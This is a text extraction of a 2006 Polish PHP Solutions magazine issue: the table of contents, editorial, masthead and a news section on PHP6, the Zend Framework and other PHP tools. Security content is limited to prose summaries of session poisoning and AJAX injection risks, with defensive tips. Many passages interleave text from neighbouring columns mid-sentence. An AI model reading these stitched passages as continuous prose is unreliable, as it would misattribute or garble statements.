Spis treści

POCZĄTKI
Co nowego w PHP6? 18
Richard Davey
Jedenastego listopada, 2005 roku w Paryżu odby-
Będzie się działo... ło się spotkanie twórców platformy PHP. Kluczo-
wym elementem spotkania była dyskusja nad wy-

C oś wisi w powietrzu – chciało by się rzec. Wielki-

mi krokami zbliża się PHP6, Oracle kupuje Zenda
– jedyną prawdziwą „firmę od PHP”, a Microsoft szko-
znaczeniem przyszłych kierunków rozwoju dla tej
technologii.

li i egzaminuje deweloperów technologii Open Source,

w tym PHP. Już teraz w siedzibach Microsoftu na ca-
łym świecie możemy zdobyć tytuł Zend Certified En- TECHNIKI
gineer. Czy nadchodzi więc rewolucja? Czy wydarze- Strumieniowa transmisja
nia te zwiastują jakieś zmiany? I tak i nie. PHP6 nie przyniesie totalnie dźwięku przez HTTP
przełomowych rozwiązań. Będzie to raczej ewolucja, ale starannie za- z wykorzystaniem Ampache 22
planowana, przemyślana i jak najbardziej potrzebna. O tym, co się zmie- Karl Vollmer
ni w PHP, a co nie, przeczytacie w artykule Richarda Davey'a, Co nowe- Do stworzenia portalu multimedialnego nie trze-
go w PHP6? ba drogich, komercyjnych, wydzielonych serwerów.
Z drugiej strony, mianem rewolucyjnego przedsięwzięcia określiłbym Wystarczą PHP, serwer Apache oraz baza MySQL.
Zend Collaboration Project, a w szczególności Zend PHP Framework.
Faktem jest, że kolejne frameworki dla PHP powstają prawie jak grzyby Wzorce projektowe w akcji,
po deszczu, ale wybór odpowiedniego narzędzia nadal jest bardzo trudny czyli ciąg dalszy Niezbędnika
i często kończy się porażką, szczególnie w przypadku programistów, któ- dewelopera PHP 28
rzy po takie rozwiązanie sięgają po raz pierwszy. Zend PHP Framework Piotr Szarwas
jest szansą dla deweloperów na wybór profesjonalnego, solidnego i rozwi-
Czytelny i przejrzysty kod. Elastyczna i w każ-
janego narzędzia z odpowiednim wsparciem ze strony deweloperów. Na
dym momencie gotowa na rozbudowę archi-
pewno zainteresuje się nim wiele firm, którym brakowało do tej pory dobre- tektura. Bogata, dne omówione w tym artykule
go frameworka klasy Enterprise. wzorce projektowe.
Rozczarowuje natomiast druga część Zend Collaboration Project:
Zend Developer Zone. W zamyśle twórców miało być to Centrum dla
Deweloperów PHP. Już teraz znajdziemy tam ciekawe artykuły, m.in.
o wzorcach projektowych, ale po wejściu na forum zamiast prawdziwej
NARZĘDZIA
dyskusji deweloperów zastaniemy już tylko puste reklamy komercyjnych Projekt eyeOS: rewolucja
produktów Zenda, co źle wróży całemu przedsięwzięciu. Pozostaje mieć w interfejsach webowych PHP 36
tylko nadzieję, że takie Centrum kiedyś powstanie, jak nie teraz to w naj- Steven Mautone i Pau Garcia-Milà
bliższej przyszłości. Wyobraźmy sobie, że nasze aplikacje webowe są
Pustki z całą pewnością nie zastaniecie w magazynie PHP Solutions. elastyczne i umożliwiają uruchamianie wielu aplikacji
W obecnym wydaniu przeczytacie ciekawy wywiad z Ilia Alshanetskym, w jednym oknie przeglądarki – w ramkach o dowol-
dowiecie się, jak zbudowano pierwszy system operacyjny w PHP i przeko- nym rozmiarze, które można przeciągać, minimali-
nacie się, że małżeństwo PHP i Pythona daje wiele korzyści. Powiemy też zować i przywracać. Wyobraźmy sobie pulpit WWW
o streamingu audio z poziomu PHP, zatruwaniu sesji i przedstawimy trzy z paskiem zadań i koszem na śmieci...
kolejne wzorce projektowe.
DBDesigner 4 odpowiednik Oracle
Gorąco zapraszam do lektury Designera 42
Pierre Hebel
Poprawne modelowanie danych jest gwaran-
cją skuteczności podczas formuowania zapytań
Nasz magazyn ukazuje się w czterech językach! do waszej bazy danych. DBDesigner 4 pozwala
mieć globalny, graficzny i bardzo precyzyjny wi-
polskim niemieckim francuskim włoskim dok szczególnie na dużych strukturach danych.

Lokalizacja w PHP
przy użyciu standardu TMX 50
Nicola Asuni
Wyobraź sobie, że jesteś głównym programistą w ze-
spole budującym olbrzymią aplikację, która jako pro-
dukt przeznaczony na rynek globalny musi wspierać
dziesięć różnych języków. Dzięki TMX podczas tłu-
Jeśli jesteś zainteresowany zakupem licencji na wydawanie naszych pism prosimy o kontakt: maczeń nie pojawią się żadne „przypadkowe” błędy,
Monika Godlewska monikag@software.com.pl tel.: 48 22 887 12 66, fax: 48 22 887 10 11 zaś Twój kod pozostanie nienaruszony.

4 www.phpsolmag.org PHP Solutions Nr 3/2006

 Spis treści
PROJEKTY
ImageVault:
Ograniczanie dostępu do plików
multimedialnych w PHP 56
Patrick O’Brien Pytania dotyczące
prenumeraty
Każdy chyba ma jakieś prywatne zdjęcia, który- tel. (22) 887 14 44
mi chciałby się podzielić, ale które wolałby jed- e-mail: pren@software.com.pl
nocześnie ukryć przed wścibskim ogółem inter- Software Wydawnictwo Sp. z o.o.
nautów. Cel ten można łatwo osiągnąć. dział prenumeraty
ul. Piaskowa 3
Mariaż Pythona i PHP. 01-067 Warszawa
Tworzymy interfejs graficzny CD Strona WWW/Forum
z wykorzystaniem SOAP 62 tel. (22) 887 14 44 strona www: www.phpsolmag.org
e-mail: cd@software.com.pl Tu znajdą Państwo informacje
Krzysztof Sobolewski dotyczące aktualnych i przyszłych
Software Wydawnictwo Sp. z o.o.
PHP słynie z oprogramowania serwerowego, Defekty CD/DVD numerów magazynu PHP Solutions.
Python – z możliwości łatwego tworzenia roz- ul. Piaskowa 3
budowanych aplikacji klienckich, Łacząc możli- 01-067 Warszawa Forum: www.phpsolmag.org/newforum
Zachęcamy do dyskusji na naszym
wości obu języków w prosty sposób otrzymamy
Zamówienia forum. Czekamy na propozycje
potężną i funkcjonalną aplikację typu klient-ser- /Numery archiwalne tematów, które chcieliby Państwo
wer. tel. (22) 887 14 44 znaleźć w najbliższym numerze pisma.
e-mail: pren@software.com.pl Zapraszamy także do wymiany
sklep on-line: www.shop.software.com.pl poglądów z innymi fanami PHP.
BEZPIECZEŃSTWO Kontakt z redakcją Cena
e-mail: redakcja@phpsolmag.org Prenumerata: 135 zł
Techniki zatruwania sesji Software Wydawnictwo Sp. z o.o. Przelew na konto nr:
w PHP 72 Redakcja PHP Solutions 46 1440 1299 0000 0000 0391 8238
Jakub Mrugalski ul. Piaskowa 3 Nordea Bank Polska S.A.
01-067 Warszawa II Oddział w Warszawie
Słyszałeś o przechwytywaniu i modyfikowaniu
zmiennych POST, GET i COOKIES i myślisz,
Wyróżnieni betatesterzy: Krzysztof Trynkiewicz, Kamil Kaczmarczyk, Łukasz Witczak,
że wystarczy zamiast z nich korzystać z sesji, Łukasz Jasiński, Tomasz Skaraczyński, Przemysław Sobstel.
aby odgrodzić się murem od niebezpieczeństw.
Rzeczywistość jest znacznie gorsza: to, co wy-
daje się być ścianą warowni, jest zaledwie para-
wanem, który bardzo łatwo naruszyć. PHP Solutions jest wydawany przez Software-Wydawnictwo Sp. z o.o.

Dyrektor Wydawniczy: Jarosław Szumski

Market Manager: Sylwia Tuśnio sylwia.tusnio@software.com.pl
Product Manager: Maciej Krawcewicz maciej.krawcewicz@phpsolmag.org

PEAR Redaktor prowadzący: Dariusz Pawłowski dpawlowski@phpsolmag.org

Redaktor : Krzysztof Sobolewski krzysztof.sobolewski@phpsolmag.org
Stali współpracownicy: Paweł Kozłowski pkozlowski@phpsolmag.org, Paweł Grzesiak pgrzesiak@phpsolmag.org
Generowanie kodu XML Kierownik produkcji: Marta Kurpiewska marta@software.com.pl
za pomocą XML_Serializer 76 Projekt okładki: Agnieszka Marchocka
Skład i łamanie: Sławomir Zadrożny slawekz@software.com.pl
Aaron Wormus Dział reklamy: adv@software.com.pl
Prenumerata: Marzena Dmowska pren@software.com.pl
W artykule pokażemy zastosowanie PEAR-owy Nakład: 6 000 egz.
pakiet do generowania dokumentów XML.
Adres korespondencyjny: Software-Wydawnictwo Sp. z o.o.,
ul. Piaskowa 3, 01-067 Warszawa, Polska
tel. +48 22 887 10 10, fax +48 22 887 10 11
www.phpsolmag.org cooperation@software.com.pl
VARIA
Dołączoną do magazynu płytę CD przetestowano programem AntiVirenKit firmy G DATA Software Sp. z o.o.
Wywiad z Ilią Alshanetskym 16
Redakcja dokłada wszelkich starań, by publikowane w piśmie i na towarzyszących mu nośnikach informacje
Dariusz Pawłowski i programy były poprawne, jednakże nie bierze odpowiedzialności za efekty wykorzystania ich; nie gwarantuje
także poprawnego działania programów shareware, freeware i public domain.
Uszkodzone podczas wysyłki płyty wymienia redakcja.
Aktualności 6 Wszystkie znaki firmowe zawarte w piśmie są własnością odpowiednich firm
i zostały użyte wyłącznie w celach informacyjnych.

Redakcja używa systemu automatycznego składu

Do tworzenia wykresów i diagramów wykorzystano program firmy
Opis CD 12
Osoby zainteresowane współpracą prosimy o kontakt: cooperation@software.com.pl

Druk: ArtDruk

Recenzje 59 Wysokość nakładu obejmuje również dodruki. Redakcja nie udziela pomocy technicznej w instalowaniu
i użytkowaniu programów zamieszczonych na płytach CD-ROM dostarczonych razem z pismem.
Sprzedaż aktualnych lub archiwalnych numerów pisma po innej cenie niż wydrukowana na okładce
Listingi wszystkich opisywanych programów zo- – bez zgody wydawcy – jest działaniem na jego szkodę i skutkuje odpowiedzialnością sądową.
stały zamieszczone na naszej stronie interneto-
Pismo ukazuje się w następujących wersjach językowych:
wej www.phpsolmag.org/pl. polskiej , francuskiej , niemieckiej oraz włoskiej .

PHP Solutions Nr 3/2006 www.phpsolmag.org 5

Aktualności

Million Dollar Homepage

Student z Wielkiej Brytanii zarobił ponad milion PHP Collaboration Project: Zend PHP Framework

dolarów sprzedając pod reklamę powierzch-
nię miliona pikseli na swojej stronie WWW. Na
ostatniej aukcji sprzedał ostatnie tysiąc pikse-
li za ponad 38 tyś dolarów. Wykupione reklamy
będą wisieć na stronie przez najbliższe pięć lat.
Reklamodawcy mogą być zadowoleni – stronę
odwiedza dziennie ok. 500 tyś użytkowników.
Jest to kolejny dowód na szybki i łatwy sukces
w dobie wszechogarniającego Internetu. Stu-
dent zakończył naukę i postanowił zainwesto-
wać zdobyte pieniądze.
http://www.milliondollarhomepage.com/
Oracle przejmuje PHP
Pojawiły się informacje, że Oracle postanowił
kupić 3 firmy tworzące oprogramowanie Open
Source: JBoss, Zend Technologies i Sleepycat.
Ma to związek z rosnącym zainteresowaniem
narzędziami i produktami Open Source wśród
klientów korporacyjnych Oracle.
http://news.com.com/2061-10795_3-
6037727.html
The New York PHP
Conference & Expo 2006
W dniach 14-16 lipca w Nowym Yorku odbędzie
się konferencja poświęcona w głównej mierze
zastosowaniom PHP w biznesie. Trzy dni sesji,
wykładów, warsztatów i targów mają podkreślić
rolę PHP w biznesowych aplikacjach Open So-
urce. Nie zabraknie też czysto technicznych wy-
kładów dla deweloperów, które poświęcone bę-
dą rozwiązaniom tworzonym w PHP i dla PHP.
Magazyn PHP Solutions jest patronem medial-
nym konferencji.
http://www.nyphpcon.com/
Web Technology
conference and Expo
W dniach 30 czerwca – 1 lipca w Bułgarii odbę-
dzię się trzecia edycja konferencji poświęconej
technologiom internetowym mającym zastoso-
wanie w biznesie i edukacji. W ramach wykła-
dów omówione zostaną tendencje i główne kie-
runki rozwoju technik internetowych, takich jak
PHP, .NET czy Apache::ASP.
http://wtconferences.com/2006/
T
rudno połapać się w gąszczu tak
wielu dostępnych w sieci framewor-
ków dla PHP, szczególnie początkują-
cym i średniozaawansowanym progra-
mistom PHP. Nie wiadomo, które roz-
wiązanie wybrać, które okaże się ła-
twe w nauce i intuicyjne, czy w końcu,
jakie są zastosowania konkretnego na-
rzędzia. Sen z powiek spędzają obawy,
że czas potrzebny na naukę danego fra-
meworka okaże się stracony lub wybra-
ny projekt zostanie zawieszony i nie bę-
dzie dalej rozwijany.
Na szczęście ukazał się długo
oczekiwany framework firmy Zend. Mi-
mo że projekt jest nowy i znajduje się
w fazie beta, to jednak sprawdzony, so-
lidny i stworzony przez znanych dewe-
loperów PHP z wykorzystaniem najlep-
szych praktyk programistycznych. Jed-
nym słowem, projekt, któremu można z
pewnością zaufać i zainwestować czas
w jego rzetelne poznanie. Wśród do-
stępnych komponentów można wymie-
nić m.in.:
• Zend_Controller oraz Zend_Viev (fun-
dament dla MVC),
• Zend_db (dostęp do bazy danych
oparty na PDO),
• Zend_Json (odpowiedzialny za kon-
wertowanie struktur PHP na format
JSON, tak aby następnie wykorzystać
je z poziomu AJAX-a),
• Zend_Mail i Zend_Mime (obsługa
poczty),
• Zend_Pdf (generowanie PDF-ów
w locie),
• Zend_HttpClient (klient protokołu
HTTP),
• Zend_Search_Lucene (silinik wyszu-
kiwarki napisany na podstawie po-
dobnego projektu w Javie).
Zend Framework razem z Zend Developer
Zone i Eclipse PHP IDE tworzą PHP Colla-
boration Project, który ma na celu podnie-
sienie jakości programowania i oprogramo-
wania Open Source tworzonego w PHP.
Licencja: http://framework.zend.com/
framework_license_1.0.txt
http://www.zend.com/php_collabora-
tion_project

PHP Conference UK PHP Collaboration Project: Zend Developer Zone

Dnia 10 lutego w Londynie odbyła się krót-
ka konferencja w całości poświęcona języko-
wi PHP. Prelegentami byli Matt Zandstra (The
Template Path), Derick Rethans (The eZ PHP
Components Library – Object Oriented PHP),
Christopher Kunz (PHP Security Holes and the
Hardened PHP Project), Harry Fuecks ("AJA-
X@localhost") i Paweł Kozłowski (Dependen-
cy Injection with PHP – Object Oriented PHP)
– nasz stały współpracownik i autor wielu opu-
blikowanych u nas artykułów.
Magazyn PHP Solutions był patronem medial-
nym imprezy.
http://www.phpconference.co.uk/2006/
JSON
(JavaScript Object Notation)
JSON to lekki format wymiany danych, który w
odróżnieniu od XML-a może być przetwarzany w
języku JavaScript w łatwy sposób (z wykorzysta-
niem wbudowanej funkcji eval() ). JSON jest
szczególnie przydatny przy wymianie danych w
aplikacjach opartych o AJAX. Jest szybszy i ła-
twiejszy do parsowania niż XML. Wielu dewelope-
rów uważa, że jest bardziej naturalny od XML-a,
inni twierdzą, że jego skąpa notacja jest myląca.
Format JSON wykorzystywany jest już przez
nowy Framework Zenda (zawiera komponent
Zend_Json, odpowiedzialny za konwertowanie
struktur PHP na JSON, aby potem można było
skorzystać z AJAX-a)
http://json.org/
N
ie ma chyba jednego miejsca bę-
dącego sieciowym centrum dla de-
weloperów PHP. Jest kilkanaście god-
nych uwagi portali o PHP, gdzie znaj-
dziemy trochę newsów czy przykładów.
Są też miejsca, w których informacji mo-
gą szukać profesjonaliści – np. sitepo-
int.com czy blogi znanych deweloperów
PHP. Trudno jednak nie odnieść wraże- Z drugiej strony na forum dyskusyj-
nia, że to tylko “kolejne” strony o PHP. nym Zend Developer Zone widać jedy-
W efekcie, żeby znaleźć konkretne infor- nie topiki związane z komercyjną dzia-
macje, zasypujemy hasłami przeglądar- łalnością firmy Zend (Zend Studio, Zend
kę google.com. Platfrom, Zend core for IBM itd.), co źle
Tak jednak być nie musi: Zend wy- wróży całemu przedsięwzięciu. Miejmy
szedł z ciekawą i potrzebną inicjatywą jednak nadzieję, że Developer Zone sta-
stworzenia Developer Zone dla progra- nie sie popularne i będzie cennym źró-
mistów PHP. Już teraz możemy znaleźć dłem informacji dla deweloperów PHP.
tam sporo ciekawych artykułów, np.: Cho- Miejsce w sieci, które stałoby się cen-
osing the Right PayPal Solution, czy se- trum dla programistów PHP jest czymś
rię PHP Patterns, której autorem jest Matt czego naprawdę obecnie brakuje.
Zandstra.
Jest też miejsce na tutoriale (póki co,
nie ma ich za dużo) i przykładowe skrypty. http://devzone.zend.com/

6 www.phpsolmag.org PHP Solutions Nr 3/2006


PHP-Qt, czyli graficzne interfejsy nie z tej Ziemi
P
HP-Qt to nowe rozszerzenie dla PHP 5
pozwalające na wykorzystanie biblioteki
Qt i tworzenie zaawansowanych interfejsów
graficznych w PHP. Qt jest w pełni obiekto-
wą biblioteką stworzoną z myślą o C++, któ-
ra pozwala na wykorzystanie nowoczesnych
technologii programowania GUI (mecha-
nizmy sygnałów i slotów, widgety, systemy
zdarzeń). Rozszerzenie PHP-Qt zapewnia
obiektowy interfejs dla frameworka Qt4.
Do uruchomienia środowiska PHP-Qt
będziemy potrzebowali:
• PHP 5.1.1+,
• Qt4 development/pliki nagłówkowe,
• skompilowaną bibliotekę Qt4 .
Niestety dokumentacja (http://doc.trolltech.
com/4.0/index.html) odnosi się tylko do sa-
mego Qt i jego wykorzystania z poziomu
języka C++. Archiwum PHP-Qt zawiera 6
wprowadzających tutoriali. Projekt znajduje
się jeszcze w fazie alfa.
PHOCOA – framework dla zaawansowanych
P HOCOA to w 100% obiektowy, stero-
wany zdarzeniami, oparty o kompo-
nenty i MVC framework dla PHP 5. Pro-
jekt jest wzorowany na rozwiązaniach Ap-
ple'a: Cocoa i WebObjects.
PHOCOA wykorzystuje Smarty i
Phinga (http://phing.info). Zintegrowany
jest z Propelem, FCK Editorem, Dynarch-
Menu CSS/JS Menu, czy z Dieselpoint
(aplikacja w Javie do nawigacji i wyszu-
kiwnia) co wymaga obecności PHP/Java
Bridge.
Framework oferuje bardzo wiele: od
mających ogromne zastosowanie i prak-
tycznych widgetów (Widget Toolkit), takich
jak WFTextField, WFTextArea, WFHTM-
LArea) przez mechanizmy normaliza-
cji, walidacji danych oraz kontroli błę-
dów, aż po przyjazne URL-e. PHOCOA
zapewnia też mechanizmy dowiązania
(ang. bindings), efektywne dzielenie da-
PHP Solutions Nr 3/2006
Licencja: LGPL
http://php-qt.berlios.de/
nych na strony i zaawansowane wyszuki-
wanie. Pozwala też na automatyczne ge-
nerowanie kodu np. interfejsu użytkownika
(Interface Builder) na podstawie obiektów
z Propela. Oferuje rozbudowane mecha-
nizmy uwierzytelniania i autoryzacji. Na
stronie projektu dostępna jest dokumen-
tacja wraz z przykładami. Plany twórców
frameworka są bardzo obszerne i ambit-
ne, m.in.: zmiany w architekturze, interna-
cjonalizacja, więcej przykładów i obszer-
niejsza dokumentacja. Deweloperzy pro-
jektu oferują też komercyjne wparcie.
Licencja: MIT License
http://phocoa.com/
http://developer.apple.com/cocoa/
http://developer.apple.com/tools/
webobjects/index.html
http://phing.tigris.org/
www.phpsolmag.org
Aktualności
PHPUnit 3.0
W nowej wersji PHPUnit, która ma ukazać się
w najbliższym czasie, przewidziano między in-
nymi wsparcie dla Mock Objects (imitacji obiek-
tów), dzięki którym możliwe jest symulowa-
nie dowolnych klas poprzez tworzenie ich imi-
tacji, co ułatwia przeprowadzanie testów jed-
nostkowych. Wiele ulepszeń powstało pod-
czas Unit Testów dla Zend Framework. Prze-
widziano też wsparcie dla protokołu Test Any-
thing Protocol (TAP). Wsparcie dla nowej wer-
sji PHPUnit szykują też deweloperzy PHPEclip-
se i Zend Studio.
http://www.sebastian-bergmann.de/blog
Aspect-Oriented
Programming i PHP
AOP to paradygmat, według którego naj-
ważniejsza jest modularyzacja i enkapsula-
cja kodu. Dla PHP powstają proste rozsze-
rzenia pozwalające stosować AOP, co jest
szczególnie zalecane przy dużych projek-
tach. Do najważniejszych rozszerzeń moż-
na zaliczyć: aoPHP (http://www.aophp.net/),
apsectPHP (http://www.cs.toronto.edu/
~yijun/aspectPHP/), phpaspect (http:
//www.phpaspect.org/), AOP Library for
PHP (http://www.phpclasses.org/browse/
package/2633.html) czy Seasar.PHP (http:
//www.seasar.org/)
SimpleTest kontra PHPUnit2
Blog Sebiastiana Bergmana, twórcy PHPUnit,
zawiera krótkie porównanie dwóch najważ-
niejszych i najbardziej znanych narzędzi do
przeprowadzania testów jednostkowych: Sim-
pleTest i PHPUnit. Znajdziemy tam odwoła-
nie do strony deweloperów frameworka Agavi,
którzy sprobowali użyć obu narzędzi, wybiera-
jąc ostatecznie SimpleTest. Swoje argumenty
podali na stronie: http://trac.agavi.org/trac.cgi/
wiki/UnitTested. Bergman polemizuje z tymi
argumentami.
http://www.sebastian-bergmann.de/
Microsoft
szkoli deweloperów PHP
Microsoft rozpoczął współprace z Zendem i
przeprowadza egzaminy na Zend Certified En-
gineer. Gigant prowadzi też kompleksowe szko-
lenia pod nazwą Cross Training for Web Deve-
lopers dla programistów PHP, JSP czy ColdFu-
sion. Na stronie znajdziemy tutoriale dla wymie-
nionych technologii, niestety raczej dla począt-
kujących. Wygląda na to Microsoft nie odwraca
się od konkurencji, tylko bierze coraz większy
udział w rozwijaniu technologii, narzędzi i usług
związanych z Open Source.
http://aspnet.cmp.com/
Zostań Freelancerem
od PHP, czyli PHP Job Links
Jeśli szukasz pomysłów, jak wykorzy-
stać swoje umiejętności i zapał w tworze-
niu aplikacji WWW, sprawdź stronę: http:
//www.phpkitchen.com/index.php?/archives/
670-PHP-Freelance.html.
Znajdziesz tam oferty firm, które chętnie zatrud-
nią Cie na zasadzie Freelancera. Warto odwie-
dzić wymienione na liście strony, chociażby po
to, by przekonać się, jakie projekty obecnie naj-
częściej się rozwija i w co warto inwestować
swoje umiejętności i czas.
IntSmarty
IntSmarty to rozszerzenie dla systemu sza-
blonów Smarty pozwalające na łatwe tworze-
nie wielojęzycznych stron WWW. Ułatwia ono
wspólną pracę programistom, grafikom i tłuma-
czom. Rozszerzenie zostało stworzone przez
Johna Coggeshalla.
Licencja: Coggeshall.org
http://www.coggeshall.org/oss/intsmarty/
7
Aktualności

Kupu i Bitflux, czyli edytory Bezpieczeństwo AJAX-a

na każdą przeglądarkę
Kupu i Bitflux to chyba jedyne edytory Open
Source typu WYSWIG wspierane zarówno
przez Internet Explorer, jak i Mozillę. Pierwszy
A JAX umożliwia tworzenie interaktyw-
nych i bogatych interfejsów webo-
wych, przez co stał się ostatnio ogromnie
czy przestrzegać kilku prostych, funda-
mentalnych zasad:
to edytor XHTML, drugi służy do edycji i wali-
dacji XML-a. Kupu łatwo integruje się z dowol- popularny i obecnie korzysta z niego co- • sprawdzać podatność na ataki SQL
nym systemem CMS, jest rozszerzalny i tworzy
czysty oraz zgodny ze standardem kod XHTML raz więcej aplikacji. injections,
(bazuje na CSS). Bitfluxowi pod względem Okazuje się jednak, że wykorzysta- • sprawdzać podatność na JavaSrcipt
funkcjonalnym również niczego nie można za-
rzucić. Obie pozycje są warte uwagi i polecenia. nie tej technologii może nieść poważne injections,
http://www.oscom.org/projects/ zagrożenia. • przenieść logikę biznesową na stronę
Do ataku agresor może wykorzy- serwera,
Zend Framework stać obiekt XMLHttpRequest, podglą- • przeprowadzać walidację danych,
w Gentoo Linux
Gentoo Linux to dystrybucja Linuksa z jednym z dając kod wyświetlonej strony (ustala- • sprawdzać nagłówki zapytań HTTP,
najbogatszych, jeśli nie najbogatszym repozyto- jąc, jaką stronę wywołujemy i jakie pa- • nie traktować każdego zapytania jako
rium pakietów. Każdy pakiet zainstalować moż-
na jednym poleceniem, system sam zatroszczy rametry przesyłamy) i wstrzykując od- prawdziwego.
się o zainstalowanie zależnych pakietów. Do re- powiedni skrypt. Można się jednak przed
pozytorium (drzewa portage) Gentoo trafił Fra-
mework Zenda i jest teraz dostępny dla wszyst-
tym bardzo łatwo zabezpieczyć, wystar- http://searchwebservices.techtarget.com/
kich użytkowników tej dysrybucji.
http://www.sebastian-bergmann.de/blog/
archives/581-Zend-Framework-in-Gentoo-Li-
nux.html
WinBinder v.0.43 alfa
ADOdb Active Record
ADOdb_Active_Record to narzędzie ORM (Ob-
ject Relation Mapping) podobne do Zend_
W inBinder to rozszerzenie dla PHP
4 i PHP 5 pozwalające na two-
rzenie natywnych aplikacji okienko-
Db_DataObject, tylko stworzone dla ADOdb. wych pod Windows. Pierwsze, co przy-
ADOdb_Active_Record odwzorowuje struktu-
rę bazy danych na klasy w kodzie PHP. Pozwa- chodzi na myśl, to podobieństwo do in-
la to w większym stopniu skupić się na danych nych narzędzi takich jak PHP-GTK. W
i kodzie PHP, a mniej na zapytaniach SQL.
Wiersz w tabeli odwzorowywany jest przez in- zakresie tworzenia samych interfejsów
stancję klasy PHP. Bez problemów mogą być WinBinder oferuje podobne możliwo-
również definiowane relacje. ADOdb_Acti-
ve_Record opiera się na wzorcu ActiveRecord.
ści co PHP-GTK: interfejs składamy z
Licencja: BSD, LGPL widgetów (ang. widgets), zdarzeń (ang.
http://phplens.com/lens/adodb/docs-active-re- events) i akcji (ang. actions). Tu jednak
cord.htm
podobieństwa się kończą. zadań czy np. klasy to łączenia zda-
php Free Chat W odróżnieniu od PHP-GTK, Win- rzeń z akcjami zdefiniowanymi przez
php Free Chat to prosty czat napisany w PHP.
Bazuje na plikach tekstowych i wykorzystu-
Binder pozwala na tworzenie kom- użytkownika (np. kliknięcie na przy-
je AJAX m.in do odświeżania strony. System pletnych aplikacji, a nie tylko interfej- cisk powoduje pojawienie się komu-
wykorzystuje CSS i jest łatwy w rozszerzaniu.
sów użytkownika. Pakiet oferuje więc nikatu). Winbinder umożliwia też two-
Można napisać własne style CSS, zmieniając
w ten sposób całkowicie wygląd interfejsu lub wszystkie możliwości PHP, a z drugiej rzenie aplikacji bazodanowych (SQLi-
stworzyć rozszerzenie pozwalające na przecho- strony zapewnia to co oferuje środo- te, MySQL).
wywanie danych np. w MySQL-u. Na stronie
domowej projektu można wypróbować wersję wisko Windows. WinBinder umożliwia W najnowszej wersji biblioteki wpro-
demonstracyjną aplikacji. nawet niskopoziomowy dostęp do za- wadzono kilka istotnych zmian. Projekt
Licencja: LGPL
http://www.phpfreechat.net/
sobów systemu (np. RAM), choć i tak zaopatrzono w nowy installer (doda-
najczęściej wykorzystywane są funkcje no m.in. :SQLite, FreeImage ) i zapew-
BLENC dla PHP 5 związane z implementacją GUI. Roz- niono nową strukturę folderów. Dodano
BLENC to rozszerzenie dla PHP 5 będące pro-
stym enkoderem pozwalającym na zakodowa- szerzenie opakowuje (ang. wrapping) i zmodyfikowano też kilka funkcji oraz
nie kodu źródłowego aplikacji z wykorzystaniem natywne funkcje Windows swoimi kla- naprawiono wiele błędów.
algorytmu Blowfish. Proces szyfrowania polega
na wywołaniu funkcji blenc_encrypt(), któ- sami i funkcjami. Mamy do dyspozy- Archiwum WinBindera zawiera
ra wczytuje kod źródłowy i generuje jego zaszy- cji klasy do tworzenia okienek, przyci- wszystko, co potrzeba. Znajdziemy tam
frowaną wersję. Rozszerzenie dostępne jest w
sków, pól tekstowych, menu, pasków binaria, jak i kod źródłowy biblioteki.
repozytorium PECL.
Licencja: PECL Deweloperzy załączyli również manual
http://pecl.php.net/package/BLENC oraz kilka przykładów – od bardzo pro-
pecl_http stych, jak aplikacja Hello World, do bar-
Pakiet zapewnia rozszerzone wsparcie dla pro- dziej skomplikowanych, jak np. zalążek
tokołu HTTP. Wspiera URL-e, daty, przekie-
rowania, nagłówki, różne języki i kodowanie.
edytora GUI.
Umożliwia przesyłanie danych z cachowaniem
czy wznawianiem transferu np. po przerwaniu
połączenia. Może współpracować z CURL-em.
Klasy dla PHP 5: HttpUtil, HttpMessage, Htt-
pRequest, HttpRequestPool, HttpDeflateStre- Najnowsza wersja WinBindera może pra-
am, HttpInflateStream, HttpQueryString. Klasy
dla PHP 5.1: HttpResponse cować z PHP 5.1.1.
Licencja: PECL Licencja: BSD
http://pecl.php.net/package/pecl_http
http://pecl.php.net/package/winbinder

8 www.phpsolmag.org PHP Solutions Nr 3/2006


PHP 4.4.2 i PHP 5.1.2
M imo, że PHP w wersji piątej już od
jakiegoś czasu dominuje na serwe-
rach, nie zanosi się póki co, na zamknięcie
czwartej linii języka. Jej kolejne wersje wy-
dawane są regularnie, podobnie jak PHP 5.
Do najważniejszych zmian w PHP
4.4.2 można zaliczyć: usunięcie proble-
mu związanego z możliwością przepro-
wadzenia ataków XSS w konkretnych sy-
tuacjach; usunięcie problemów z funkcja-
mi key() and current(); naprawienie błęd-
nego funkcjonowania PHP z Apache 2 na
FUDforum – najlepsze darmowe forum w PHP?
Z całą pewnością FUDforum jest jed-
nym z najlepszych systemów for
dyskusyjnych napisanych w PHP, w
szczególności pod względem bezpie-
czeństwa. Śmiało konkuruje z komer-
cyjnymi produktami takimi jak vBulletin
czy Invision Power Board. Jego dosko-
nałą rekomendacją jest fakt, że jest uży-
wane w takich miejscach jak Zend Deve-
loper Zone, czy portale najważniejszych
magazynów o PHP. Autorem FUDforum
jest Ilia Alshanetsky, jeden z najbardziej
znanych deweloperów PHP, autor książ-
ki PHP Security Guide, z którym mieli-
śmy okazję rozmawiać i opublikować wy-
wiad właśnie w tym wydaniu PHP Solu-
tions. Ilia na co dzień zajmuje się tema-
tyką zapewniania bezpieczeństwa apli-
kacjom WWW i tym samym zabezpiecza
FUDforum na wszelkie możliwe sposo-
by. Oczywiście kwestie bezpieczeństwa
to nie wszystko. Forum zaskakuje dużą
funkcjonalnością.
PHP Solutions Nr 3/2006
serwerach nielinuksowych; naprawienie
ponad 30 innych błędów.
W PHP 5.1.2 również wprowadzono
kilka bardzo istotnych zmian: naprawio-
no pojawiające się w pewnych sytuacjach
błędy związane z podatnością na ataki
XSS; rozszerzenia Hash i XMLWriter zo-
stały dodane do dystrybucji jako domyślne;
zaktualizowano rozszerzenie OCI8; na-
prawiono ponadto 85 różnych błędów.
http://www.php.net
Interfejs administratora jest dość
rozbudowany (i przez to niestety ma-
ło przejrzysty) i przygniata dużą ilością
opcji. Administracja forum jest przez to
nieco trudniejsza niż np. w przypadku
phpBB. Drugim (i chyba ostatnim) minu-
sem FUDforum jest kiepska szata gra-
ficzna, co może zniechęcać wielu użyt-
kowników.
Reasumując: FUDforum oferuje na-
prawdę duże możliwości i przeznaczo-
ne jest raczej dla bardziej zaawanso-
wanych użytkowników. Jeśli zdecyduje-
cie się na przejście na FUDforum, to za
pomocą dostępnych na stronie projektu
skryptów możemy dokonać bezbolesnej
migracji z najbardziej znanych for ta-
kich jak phpBB. Zachowują się wszyst-
kie dane (również uprawnienia użytkow-
ników).
Licencja: GPL
http://fudforum.org/forum/
www.phpsolmag.org
Aktualności
Data Access Object (DAO)
Code Generator
DaoGen to generator kodu źródłowego dla klas
DAO na bazie wzorca projektowego DAO. Ma
